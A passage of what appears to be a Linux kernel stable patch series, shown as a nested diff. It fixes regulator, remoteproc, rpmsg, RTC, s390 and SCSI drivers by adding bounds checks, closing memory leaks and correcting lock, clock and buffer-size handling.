+-		rdev->last_off = ktime_get();
++		rdev->last_off = ktime_get_boottime();
+ 
+ 	trace_regulator_disable_complete(rdev_get_name(rdev));
+ 
+diff --git a/drivers/regulator/max77802-regulator.c b/drivers/regulator/max77802-regulator.c
+index 21e0eb0f43f94..befe5f319819b 100644
+--- a/drivers/regulator/max77802-regulator.c
++++ b/drivers/regulator/max77802-regulator.c
+@@ -94,9 +94,11 @@ static int max77802_set_suspend_disable(struct regulator_dev *rdev)
+ {
+ 	unsigned int val = MAX77802_OFF_PWRREQ;
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	max77802->opmode[id] = val;
+ 	return regmap_update_bits(rdev->regmap, rdev->desc->enable_reg,
+ 				  rdev->desc->enable_mask, val << shift);
+@@ -110,7 +112,7 @@ static int max77802_set_suspend_disable(struct regulator_dev *rdev)
+ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	unsigned int val;
+ 	int shift = max77802_get_opmode_shift(id);
+ 
+@@ -127,6 +129,9 @@ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ 		return -EINVAL;
+ 	}
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
++
+ 	max77802->opmode[id] = val;
+ 	return regmap_update_bits(rdev->regmap, rdev->desc->enable_reg,
+ 				  rdev->desc->enable_mask, val << shift);
+@@ -135,8 +140,10 @@ static int max77802_set_mode(struct regulator_dev *rdev, unsigned int mode)
+ static unsigned max77802_get_mode(struct regulator_dev *rdev)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	return max77802_map_mode(max77802->opmode[id]);
+ }
+ 
+@@ -160,10 +167,13 @@ static int max77802_set_suspend_mode(struct regulator_dev *rdev,
+ 				     unsigned int mode)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	unsigned int val;
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
++
+ 	/*
+ 	 * If the regulator has been disabled for suspend
+ 	 * then is invalid to try setting a suspend mode.
+@@ -209,9 +219,11 @@ static int max77802_set_suspend_mode(struct regulator_dev *rdev,
+ static int max77802_enable(struct regulator_dev *rdev)
+ {
+ 	struct max77802_regulator_prv *max77802 = rdev_get_drvdata(rdev);
+-	int id = rdev_get_id(rdev);
++	unsigned int id = rdev_get_id(rdev);
+ 	int shift = max77802_get_opmode_shift(id);
+ 
++	if (WARN_ON_ONCE(id >= ARRAY_SIZE(max77802->opmode)))
++		return -EINVAL;
+ 	if (max77802->opmode[id] == MAX77802_OFF_PWRREQ)
+ 		max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
+ 
+@@ -495,7 +507,7 @@ static int max77802_pmic_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < MAX77802_REG_MAX; i++) {
+ 		struct regulator_dev *rdev;
+-		int id = regulators[i].id;
++		unsigned int id = regulators[i].id;
+ 		int shift = max77802_get_opmode_shift(id);
+ 		int ret;
+ 
+@@ -513,10 +525,12 @@ static int max77802_pmic_probe(struct platform_device *pdev)
+ 		 * the hardware reports OFF as the regulator operating mode.
+ 		 * Default to operating mode NORMAL in that case.
+ 		 */
+-		if (val == MAX77802_STATUS_OFF)
+-			max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
+-		else
+-			max77802->opmode[id] = val;
++		if (id < ARRAY_SIZE(max77802->opmode)) {
++			if (val == MAX77802_STATUS_OFF)
++				max77802->opmode[id] = MAX77802_OPMODE_NORMAL;
++			else
++				max77802->opmode[id] = val;
++		}
+ 
+ 		rdev = devm_regulator_register(&pdev->dev,
+ 					       &regulators[i], &config);
+diff --git a/drivers/regulator/s5m8767.c b/drivers/regulator/s5m8767.c
+index 35269f9982105..754c6fcc6e642 100644
+--- a/drivers/regulator/s5m8767.c
++++ b/drivers/regulator/s5m8767.c
+@@ -923,10 +923,14 @@ static int s5m8767_pmic_probe(struct platform_device *pdev)
+ 
+ 	for (i = 0; i < pdata->num_regulators; i++) {
+ 		const struct sec_voltage_desc *desc;
+-		int id = pdata->regulators[i].id;
++		unsigned int id = pdata->regulators[i].id;
+ 		int enable_reg, enable_val;
+ 		struct regulator_dev *rdev;
+ 
++		BUILD_BUG_ON(ARRAY_SIZE(regulators) != ARRAY_SIZE(reg_voltage_map));
++		if (WARN_ON_ONCE(id >= ARRAY_SIZE(regulators)))
++			continue;
++
+ 		desc = reg_voltage_map[id];
+ 		if (desc) {
+ 			regulators[id].n_voltages =
+diff --git a/drivers/regulator/tps65219-regulator.c b/drivers/regulator/tps65219-regulator.c
+index c484c943e4675..58f6541b6417b 100644
+--- a/drivers/regulator/tps65219-regulator.c
++++ b/drivers/regulator/tps65219-regulator.c
+@@ -173,24 +173,6 @@ static unsigned int tps65219_get_mode(struct regulator_dev *dev)
+ 		return REGULATOR_MODE_NORMAL;
+ }
+ 
+-/*
+- * generic regulator_set_bypass_regmap does not fully match requirements
+- * TPS65219 Requires explicitly that regulator is disabled before switch
+- */
+-static int tps65219_set_bypass(struct regulator_dev *dev, bool enable)
+-{
+-	struct tps65219 *tps = rdev_get_drvdata(dev);
+-	unsigned int rid = rdev_get_id(dev);
+-
+-	if (dev->desc->ops->is_enabled(dev)) {
+-		dev_err(tps->dev,
+-			"%s LDO%d enabled, must be shut down to set bypass ",
+-			__func__, rid);
+-		return -EBUSY;
+-	}
+-	return regulator_set_bypass_regmap(dev, enable);
+-}
+-
+ /* Operations permitted on BUCK1/2/3 */
+ static const struct regulator_ops tps65219_bucks_ops = {
+ 	.is_enabled		= regulator_is_enabled_regmap,
+@@ -217,7 +199,7 @@ static const struct regulator_ops tps65219_ldos_1_2_ops = {
+ 	.set_voltage_sel	= regulator_set_voltage_sel_regmap,
+ 	.list_voltage		= regulator_list_voltage_linear_range,
+ 	.map_voltage		= regulator_map_voltage_linear_range,
+-	.set_bypass		= tps65219_set_bypass,
++	.set_bypass		= regulator_set_bypass_regmap,
+ 	.get_bypass		= regulator_get_bypass_regmap,
+ };
+ 
+@@ -367,7 +349,7 @@ static int tps65219_regulator_probe(struct platform_device *pdev)
+ 		irq_data[i].type = irq_type;
+ 
+ 		tps65219_get_rdev_by_name(irq_type->regulator_name, rdevtbl, rdev);
+-		if (rdev < 0) {
++		if (IS_ERR(rdev)) {
+ 			dev_err(tps->dev, "Failed to get rdev for %s\n",
+ 				irq_type->regulator_name);
+ 			return -EINVAL;
+diff --git a/drivers/remoteproc/mtk_scp_ipi.c b/drivers/remoteproc/mtk_scp_ipi.c
+index 00f041ebcde63..4c0d121c2f54d 100644
+--- a/drivers/remoteproc/mtk_scp_ipi.c
++++ b/drivers/remoteproc/mtk_scp_ipi.c
+@@ -164,21 +164,21 @@ int scp_ipi_send(struct mtk_scp *scp, u32 id, void *buf, unsigned int len,
+ 	    WARN_ON(len > sizeof(send_obj->share_buf)) || WARN_ON(!buf))
+ 		return -EINVAL;
+ 
+-	mutex_lock(&scp->send_lock);
+-
+ 	ret = clk_prepare_enable(scp->clk);
+ 	if (ret) {
+ 		dev_err(scp->dev, "failed to enable clock\n");
+-		goto unlock_mutex;
++		return ret;
+ 	}
+ 
++	mutex_lock(&scp->send_lock);
++
+ 	 /* Wait until SCP receives the last command */
+ 	timeout = jiffies + msecs_to_jiffies(2000);
+ 	do {
+ 		if (time_after(jiffies, timeout)) {
+ 			dev_err(scp->dev, "%s: IPI timeout!\n", __func__);
+ 			ret = -ETIMEDOUT;
+-			goto clock_disable;
++			goto unlock_mutex;
+ 		}
+ 	} while (readl(scp->reg_base + scp->data->host_to_scp_reg));
+ 
+@@ -205,10 +205,9 @@ int scp_ipi_send(struct mtk_scp *scp, u32 id, void *buf, unsigned int len,
+ 			ret = 0;
+ 	}
+ 
+-clock_disable:
+-	clk_disable_unprepare(scp->clk);
+ unlock_mutex:
+ 	mutex_unlock(&scp->send_lock);
++	clk_disable_unprepare(scp->clk);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/remoteproc/qcom_q6v5_mss.c b/drivers/remoteproc/qcom_q6v5_mss.c
+index fddb63cffee07..7dbab5fcbe1e7 100644
+--- a/drivers/remoteproc/qcom_q6v5_mss.c
++++ b/drivers/remoteproc/qcom_q6v5_mss.c
+@@ -10,7 +10,6 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/devcoredump.h>
+-#include <linux/dma-map-ops.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/interrupt.h>
+ #include <linux/kernel.h>
+@@ -18,6 +17,7 @@
+ #include <linux/module.h>
+ #include <linux/of_address.h>
+ #include <linux/of_device.h>
++#include <linux/of_reserved_mem.h>
+ #include <linux/platform_device.h>
+ #include <linux/pm_domain.h>
+ #include <linux/pm_runtime.h>
+@@ -211,6 +211,9 @@ struct q6v5 {
+ 	size_t mba_size;
+ 	size_t dp_size;
+ 
++	phys_addr_t mdata_phys;
++	size_t mdata_size;
++
+ 	phys_addr_t mpss_phys;
+ 	phys_addr_t mpss_reloc;
+ 	size_t mpss_size;
+@@ -933,52 +936,47 @@ static void q6v5proc_halt_axi_port(struct q6v5 *qproc,
+ static int q6v5_mpss_init_image(struct q6v5 *qproc, const struct firmware *fw,
+ 				const char *fw_name)
+ {
+-	unsigned long dma_attrs = DMA_ATTR_FORCE_CONTIGUOUS | DMA_ATTR_NO_KERNEL_MAPPING;
+-	unsigned long flags = VM_DMA_COHERENT | VM_FLUSH_RESET_PERMS;
+-	struct page **pages;
+-	struct page *page;
++	unsigned long dma_attrs = DMA_ATTR_FORCE_CONTIGUOUS;
+ 	dma_addr_t phys;
+ 	void *metadata;
+ 	int mdata_perm;
+ 	int xferop_ret;
+ 	size_t size;
+-	void *vaddr;
+-	int count;
++	void *ptr;
+ 	int ret;
+-	int i;
+ 
+ 	metadata = qcom_mdt_read_metadata(fw, &size, fw_name, qproc->dev);
+ 	if (IS_ERR(metadata))
+ 		return PTR_ERR(metadata);
+ 
+-	page = dma_alloc_attrs(qproc->dev, size, &phys, GFP_KERNEL, dma_attrs);
+-	if (!page) {
+-		kfree(metadata);
+-		dev_err(qproc->dev, "failed to allocate mdt buffer\n");
+-		return -ENOMEM;
+-	}
+-
+-	count = PAGE_ALIGN(size) >> PAGE_SHIFT;
+-	pages = kmalloc_array(count, sizeof(struct page *), GFP_KERNEL);
+-	if (!pages) {
+-		ret = -ENOMEM;
+-		goto free_dma_attrs;
+-	}
+-
+-	for (i = 0; i < count; i++)
+-		pages[i] = nth_page(page, i);
++	if (qproc->mdata_phys) {
++		if (size > qproc->mdata_size) {
++			ret = -EINVAL;
++			dev_err(qproc->dev, "metadata size outside memory range\n");
++			goto free_metadata;
++		}
+ 
+-	vaddr = vmap(pages, count, flags, pgprot_dmacoherent(PAGE_KERNEL));
+-	kfree(pages);
+-	if (!vaddr) {
+-		dev_err(qproc->dev, "unable to map memory region: %pa+%zx\n", &phys, size);
+-		ret = -EBUSY;
+-		goto free_dma_attrs;
++		phys = qproc->mdata_phys;
++		ptr = memremap(qproc->mdata_phys, size, MEMREMAP_WC);
++		if (!ptr) {
++			ret = -EBUSY;
++			dev_err(qproc->dev, "unable to map memory region: %pa+%zx\n",
++				&qproc->mdata_phys, size);
++			goto free_metadata;
++		}
++	} else {
++		ptr = dma_alloc_attrs(qproc->dev, size, &phys, GFP_KERNEL, dma_attrs);
++		if (!ptr) {
++			ret = -ENOMEM;
++			dev_err(qproc->dev, "failed to allocate mdt buffer\n");
++			goto free_metadata;
++		}
+ 	}
+ 
+-	memcpy(vaddr, metadata, size);
++	memcpy(ptr, metadata, size);
+ 
+-	vunmap(vaddr);
++	if (qproc->mdata_phys)
++		memunmap(ptr);
+ 
+ 	/* Hypervisor mapping to access metadata by modem */
+ 	mdata_perm = BIT(QCOM_SCM_VMID_HLOS);
+@@ -1008,7 +1006,9 @@ static int q6v5_mpss_init_image(struct q6v5 *qproc, const struct firmware *fw,
+ 			 "mdt buffer not reclaimed system may become unstable\n");
+ 
+ free_dma_attrs:
+-	dma_free_attrs(qproc->dev, size, page, phys, dma_attrs);
++	if (!qproc->mdata_phys)
++		dma_free_attrs(qproc->dev, size, ptr, phys, dma_attrs);
++free_metadata:
+ 	kfree(metadata);
+ 
+ 	return ret < 0 ? ret : 0;
+@@ -1836,6 +1836,7 @@ static int q6v5_init_reset(struct q6v5 *qproc)
+ static int q6v5_alloc_memory_region(struct q6v5 *qproc)
+ {
+ 	struct device_node *child;
++	struct reserved_mem *rmem;
+ 	struct device_node *node;
+ 	struct resource r;
+ 	int ret;
+@@ -1882,6 +1883,26 @@ static int q6v5_alloc_memory_region(struct q6v5 *qproc)
+ 	qproc->mpss_phys = qproc->mpss_reloc = r.start;
+ 	qproc->mpss_size = resource_size(&r);
+ 
++	if (!child) {
++		node = of_parse_phandle(qproc->dev->of_node, "memory-region", 2);
++	} else {
++		child = of_get_child_by_name(qproc->dev->of_node, "metadata");
++		node = of_parse_phandle(child, "memory-region", 0);
++		of_node_put(child);
++	}
++
++	if (!node)
++		return 0;
++
++	rmem = of_reserved_mem_lookup(node);
++	if (!rmem) {
++		dev_err(qproc->dev, "unable to resolve metadata region\n");
++		return -EINVAL;
++	}
++
++	qproc->mdata_phys = rmem->base;
++	qproc->mdata_size = rmem->size;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 115c0a1eddb10..35df1b0a515bf 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -954,6 +954,7 @@ static void qcom_glink_handle_intent(struct qcom_glink *glink,
+ 	spin_unlock_irqrestore(&glink->idr_lock, flags);
+ 	if (!channel) {
+ 		dev_err(glink->dev, "intents for non-existing channel\n");
++		qcom_glink_rx_advance(glink, ALIGN(msglen, 8));
+ 		return;
+ 	}
+ 
+@@ -1446,6 +1447,7 @@ static void qcom_glink_rpdev_release(struct device *dev)
+ {
+ 	struct rpmsg_device *rpdev = to_rpmsg_device(dev);
+ 
++	kfree(rpdev->driver_override);
+ 	kfree(rpdev);
+ }
+ 
+@@ -1689,6 +1691,7 @@ static void qcom_glink_device_release(struct device *dev)
+ 
+ 	/* Release qcom_glink_alloc_channel() reference */
+ 	kref_put(&channel->refcount, qcom_glink_channel_release);
++	kfree(rpdev->driver_override);
+ 	kfree(rpdev);
+ }
+ 
+diff --git a/drivers/rtc/rtc-pm8xxx.c b/drivers/rtc/rtc-pm8xxx.c
+index dc6d1476baa59..e10e2c8730602 100644
+--- a/drivers/rtc/rtc-pm8xxx.c
++++ b/drivers/rtc/rtc-pm8xxx.c
+@@ -221,7 +221,6 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ {
+ 	int rc, i;
+ 	u8 value[NUM_8_BIT_RTC_REGS];
+-	unsigned int ctrl_reg;
+ 	unsigned long secs, irq_flags;
+ 	struct pm8xxx_rtc *rtc_dd = dev_get_drvdata(dev);
+ 	const struct pm8xxx_rtc_regs *regs = rtc_dd->regs;
+@@ -233,6 +232,11 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ 		secs >>= 8;
+ 	}
+ 
++	rc = regmap_update_bits(rtc_dd->regmap, regs->alarm_ctrl,
++				regs->alarm_en, 0);
++	if (rc)
++		return rc;
++
+ 	spin_lock_irqsave(&rtc_dd->ctrl_reg_lock, irq_flags);
+ 
+ 	rc = regmap_bulk_write(rtc_dd->regmap, regs->alarm_rw, value,
+@@ -242,19 +246,11 @@ static int pm8xxx_rtc_set_alarm(struct device *dev, struct rtc_wkalrm *alarm)
+ 		goto rtc_rw_fail;
+ 	}
+ 
+-	rc = regmap_read(rtc_dd->regmap, regs->alarm_ctrl, &ctrl_reg);
+-	if (rc)
+-		goto rtc_rw_fail;
+-
+-	if (alarm->enabled)
+-		ctrl_reg |= regs->alarm_en;
+-	else
+-		ctrl_reg &= ~regs->alarm_en;
+-
+-	rc = regmap_write(rtc_dd->regmap, regs->alarm_ctrl, ctrl_reg);
+-	if (rc) {
+-		dev_err(dev, "Write to RTC alarm control register failed\n");
+-		goto rtc_rw_fail;
++	if (alarm->enabled) {
++		rc = regmap_update_bits(rtc_dd->regmap, regs->alarm_ctrl,
++					regs->alarm_en, regs->alarm_en);
++		if (rc)
++			goto rtc_rw_fail;
+ 	}
+ 
+ 	dev_dbg(dev, "Alarm Set for h:m:s=%ptRt, y-m-d=%ptRdr\n",
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index 5d0b9991e91a4..b20ce86b97b29 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -6956,8 +6956,10 @@ dasd_eckd_init(void)
+ 		return -ENOMEM;
+ 	dasd_vol_info_req = kmalloc(sizeof(*dasd_vol_info_req),
+ 				    GFP_KERNEL | GFP_DMA);
+-	if (!dasd_vol_info_req)
++	if (!dasd_vol_info_req) {
++		kfree(dasd_reserve_req);
+ 		return -ENOMEM;
++	}
+ 	pe_handler_worker = kmalloc(sizeof(*pe_handler_worker),
+ 				    GFP_KERNEL | GFP_DMA);
+ 	if (!pe_handler_worker) {
+diff --git a/drivers/s390/char/sclp_early.c b/drivers/s390/char/sclp_early.c
+index d15b0d541de36..140d4ee29105c 100644
+--- a/drivers/s390/char/sclp_early.c
++++ b/drivers/s390/char/sclp_early.c
+@@ -161,7 +161,7 @@ static void __init sclp_early_console_detect(struct init_sccb *sccb)
+ 		sclp.has_linemode = 1;
+ }
+ 
+-void __init sclp_early_adjust_va(void)
++void __init __no_sanitize_address sclp_early_adjust_va(void)
+ {
+ 	sclp_early_sccb = __va((unsigned long)sclp_early_sccb);
+ }
+diff --git a/drivers/s390/crypto/vfio_ap_ops.c b/drivers/s390/crypto/vfio_ap_ops.c
+index 0b4cc8c597ae6..934515959ebf4 100644
+--- a/drivers/s390/crypto/vfio_ap_ops.c
++++ b/drivers/s390/crypto/vfio_ap_ops.c
+@@ -349,6 +349,8 @@ static int vfio_ap_validate_nib(struct kvm_vcpu *vcpu, dma_addr_t *nib)
+ {
+ 	*nib = vcpu->run->s.regs.gprs[2];
+ 
++	if (!*nib)
++		return -EINVAL;
+ 	if (kvm_is_error_hva(gfn_to_hva(vcpu->kvm, *nib >> PAGE_SHIFT)))
+ 		return -EINVAL;
+ 
+@@ -1844,8 +1846,10 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 		return ret;
+ 
+ 	q = kzalloc(sizeof(*q), GFP_KERNEL);
+-	if (!q)
+-		return -ENOMEM;
++	if (!q) {
++		ret = -ENOMEM;
++		goto err_remove_group;
++	}
+ 
+ 	q->apqn = to_ap_queue(&apdev->device)->qid;
+ 	q->saved_isc = VFIO_AP_ISC_INVALID;
+@@ -1863,6 +1867,10 @@ int vfio_ap_mdev_probe_queue(struct ap_device *apdev)
+ 	release_update_locks_for_mdev(matrix_mdev);
+ 
+ 	return 0;
++
++err_remove_group:
++	sysfs_remove_group(&apdev->device.kobj, &vfio_queue_attr_group);
++	return ret;
+ }
+ 
+ void vfio_ap_mdev_remove_queue(struct ap_device *apdev)
+diff --git a/drivers/scsi/aacraid/aachba.c b/drivers/scsi/aacraid/aachba.c
+index 4d4cb47b38467..24c049eff157a 100644
+--- a/drivers/scsi/aacraid/aachba.c
++++ b/drivers/scsi/aacraid/aachba.c
+@@ -818,8 +818,8 @@ static void aac_probe_container_scsi_done(struct scsi_cmnd *scsi_cmnd)
+ 
+ int aac_probe_container(struct aac_dev *dev, int cid)
+ {
+-	struct scsi_cmnd *scsicmd = kzalloc(sizeof(*scsicmd), GFP_KERNEL);
+-	struct aac_cmd_priv *cmd_priv = aac_priv(scsicmd);
++	struct aac_cmd_priv *cmd_priv;
++	struct scsi_cmnd *scsicmd = kzalloc(sizeof(*scsicmd) + sizeof(*cmd_priv), GFP_KERNEL);
+ 	struct scsi_device *scsidev = kzalloc(sizeof(*scsidev), GFP_KERNEL);
+ 	int status;
+ 
+@@ -838,6 +838,7 @@ int aac_probe_container(struct aac_dev *dev, int cid)
+ 		while (scsicmd->device == scsidev)
+ 			schedule();
+ 	kfree(scsidev);
++	cmd_priv = aac_priv(scsicmd);
+ 	status = cmd_priv->status;
+ 	kfree(scsicmd);
+ 	return status;
+diff --git a/drivers/scsi/aic94xx/aic94xx_task.c b/drivers/scsi/aic94xx/aic94xx_task.c
+index ed119a3f6f2ed..7f02083001100 100644
+--- a/drivers/scsi/aic94xx/aic94xx_task.c
++++ b/drivers/scsi/aic94xx/aic94xx_task.c
+@@ -50,6 +50,9 @@ static int asd_map_scatterlist(struct sas_task *task,
+ 		dma_addr_t dma = dma_map_single(&asd_ha->pcidev->dev, p,
+ 						task->total_xfer_len,
+ 						task->data_dir);
++		if (dma_mapping_error(&asd_ha->pcidev->dev, dma))
++			return -ENOMEM;
++
+ 		sg_arr[0].bus_addr = cpu_to_le64((u64)dma);
+ 		sg_arr[0].size = cpu_to_le32(task->total_xfer_len);
+ 		sg_arr[0].flags |= ASD_SG_EL_LIST_EOL;
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 21c52154626f1..b93c948c4fcc4 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -20802,6 +20802,7 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 	struct lpfc_mbx_wr_object *wr_object;
+ 	LPFC_MBOXQ_t *mbox;
+ 	int rc = 0, i = 0;
++	int mbox_status = 0;
+ 	uint32_t shdr_status, shdr_add_status, shdr_add_status_2;
+ 	uint32_t shdr_change_status = 0, shdr_csf = 0;
+ 	uint32_t mbox_tmo;
+@@ -20847,11 +20848,15 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 	wr_object->u.request.bde_count = i;
+ 	bf_set(lpfc_wr_object_write_length, &wr_object->u.request, written);
+ 	if (!phba->sli4_hba.intr_enable)
+-		rc = lpfc_sli_issue_mbox(phba, mbox, MBX_POLL);
++		mbox_status = lpfc_sli_issue_mbox(phba, mbox, MBX_POLL);
+ 	else {
+ 		mbox_tmo = lpfc_mbox_tmo_val(phba, mbox);
+-		rc = lpfc_sli_issue_mbox_wait(phba, mbox, mbox_tmo);
++		mbox_status = lpfc_sli_issue_mbox_wait(phba, mbox, mbox_tmo);
+ 	}
++
++	/* The mbox status needs to be maintained to detect MBOX_TIMEOUT. */
++	rc = mbox_status;
++
+ 	/* The IOCTL status is embedded in the mailbox subheader. */
+ 	shdr_status = bf_get(lpfc_mbox_hdr_status,
+ 			     &wr_object->header.cfg_shdr.response);
+@@ -20866,10 +20871,6 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 				  &wr_object->u.response);
+ 	}
+ 
+-	if (!phba->sli4_hba.intr_enable)
+-		mempool_free(mbox, phba->mbox_mem_pool);
+-	else if (rc != MBX_TIMEOUT)
+-		mempool_free(mbox, phba->mbox_mem_pool);
+ 	if (shdr_status || shdr_add_status || shdr_add_status_2 || rc) {
+ 		lpfc_printf_log(phba, KERN_ERR, LOG_TRACE_EVENT,
+ 				"3025 Write Object mailbox failed with "
+@@ -20887,6 +20888,12 @@ lpfc_wr_object(struct lpfc_hba *phba, struct list_head *dmabuf_list,
+ 		lpfc_log_fw_write_cmpl(phba, shdr_status, shdr_add_status,
+ 				       shdr_add_status_2, shdr_change_status,
+ 				       shdr_csf);
++
++	if (!phba->sli4_hba.intr_enable)
++		mempool_free(mbox, phba->mbox_mem_pool);
++	else if (mbox_status != MBX_TIMEOUT)
++		mempool_free(mbox, phba->mbox_mem_pool);
++
+ 	return rc;
+ }
+ 
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index 9baac224b2135..bff6377023979 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -293,7 +293,6 @@ out:
+ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	struct bsg_job *job)
+ {
+-	long rval = -EINVAL;
+ 	u16 num_devices = 0, i = 0, size;
+ 	unsigned long flags;
+ 	struct mpi3mr_tgt_dev *tgtdev;
+@@ -304,7 +303,7 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	if (job->request_payload.payload_len < sizeof(u32)) {
+ 		dprint_bsg_err(mrioc, "%s: invalid size argument\n",
+ 		    __func__);
+-		return rval;
++		return -EINVAL;
+ 	}
+ 
+ 	spin_lock_irqsave(&mrioc->tgtdev_lock, flags);
+@@ -312,7 +311,7 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 		num_devices++;
+ 	spin_unlock_irqrestore(&mrioc->tgtdev_lock, flags);
+ 
+-	if ((job->request_payload.payload_len == sizeof(u32)) ||
++	if ((job->request_payload.payload_len <= sizeof(u64)) ||
+ 		list_empty(&mrioc->tgtdev_list)) {
+ 		sg_copy_from_buffer(job->request_payload.sg_list,
+ 				    job->request_payload.sg_cnt,
+@@ -320,14 +319,14 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 		return 0;
+ 	}
+ 
+-	kern_entrylen = (num_devices - 1) * sizeof(*devmap_info);
+-	size = sizeof(*alltgt_info) + kern_entrylen;
++	kern_entrylen = num_devices * sizeof(*devmap_info);
++	size = sizeof(u64) + kern_entrylen;
+ 	alltgt_info = kzalloc(size, GFP_KERNEL);
+ 	if (!alltgt_info)
+ 		return -ENOMEM;
+ 
+ 	devmap_info = alltgt_info->dmi;
+-	memset((u8 *)devmap_info, 0xFF, (kern_entrylen + sizeof(*devmap_info)));
++	memset((u8 *)devmap_info, 0xFF, kern_entrylen);
+ 	spin_lock_irqsave(&mrioc->tgtdev_lock, flags);
+ 	list_for_each_entry(tgtdev, &mrioc->tgtdev_list, list) {
+ 		if (i < num_devices) {
+@@ -344,25 +343,18 @@ static long mpi3mr_get_all_tgt_info(struct mpi3mr_ioc *mrioc,
+ 	num_devices = i;
+ 	spin_unlock_irqrestore(&mrioc->tgtdev_lock, flags);
+ 
+-	memcpy(&alltgt_info->num_devices, &num_devices, sizeof(num_devices));
++	alltgt_info->num_devices = num_devices;
+ 
+-	usr_entrylen = (job->request_payload.payload_len - sizeof(u32)) / sizeof(*devmap_info);
++	usr_entrylen = (job->request_payload.payload_len - sizeof(u64)) /
++		sizeof(*devmap_info);
+ 	usr_entrylen *= sizeof(*devmap_info);
+ 	min_entrylen = min(usr_entrylen, kern_entrylen);
+-	if (min_entrylen && (!memcpy(&alltgt_info->dmi, devmap_info, min_entrylen))) {
+-		dprint_bsg_err(mrioc, "%s:%d: device map info copy failed\n",
+-		    __func__, __LINE__);
+-		rval = -EFAULT;
+-		goto out;
+-	}
+ 
+ 	sg_copy_from_buffer(job->request_payload.sg_list,
+ 			    job->request_payload.sg_cnt,
+-			    alltgt_info, job->request_payload.payload_len);
+-	rval = 0;
+-out:
++			    alltgt_info, (min_entrylen + sizeof(u64)));
+ 	kfree(alltgt_info);
+-	return rval;
++	return 0;
+ }
+ /**
+  * mpi3mr_get_change_count - Get topology change count
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 3306de7170f64..6eaeba41072cb 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -4952,6 +4952,10 @@ mpi3mr_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		mpi3mr_init_drv_cmd(&mrioc->dev_rmhs_cmds[i],
+ 		    MPI3MR_HOSTTAG_DEVRMCMD_MIN + i);
+ 
++	for (i = 0; i < MPI3MR_NUM_EVTACKCMD; i++)
++		mpi3mr_init_drv_cmd(&mrioc->evtack_cmds[i],
++				    MPI3MR_HOSTTAG_EVTACKCMD_MIN + i);
++
+ 	if (pdev->revision)
+ 		mrioc->enable_segqueue = true;
+ 
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.c b/drivers/scsi/mpt3sas/mpt3sas_base.c
+index 4e981ccaac416..2ee9ea57554d7 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_base.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_base.c
+@@ -2992,8 +2992,7 @@ _base_config_dma_addressing(struct MPT3SAS_ADAPTER *ioc, struct pci_dev *pdev)
+ 	struct sysinfo s;
+ 	u64 coherent_dma_mask, dma_mask;
+ 
+-	if (ioc->is_mcpu_endpoint || sizeof(dma_addr_t) == 4 ||
+-	    dma_get_required_mask(&pdev->dev) <= DMA_BIT_MASK(32)) {
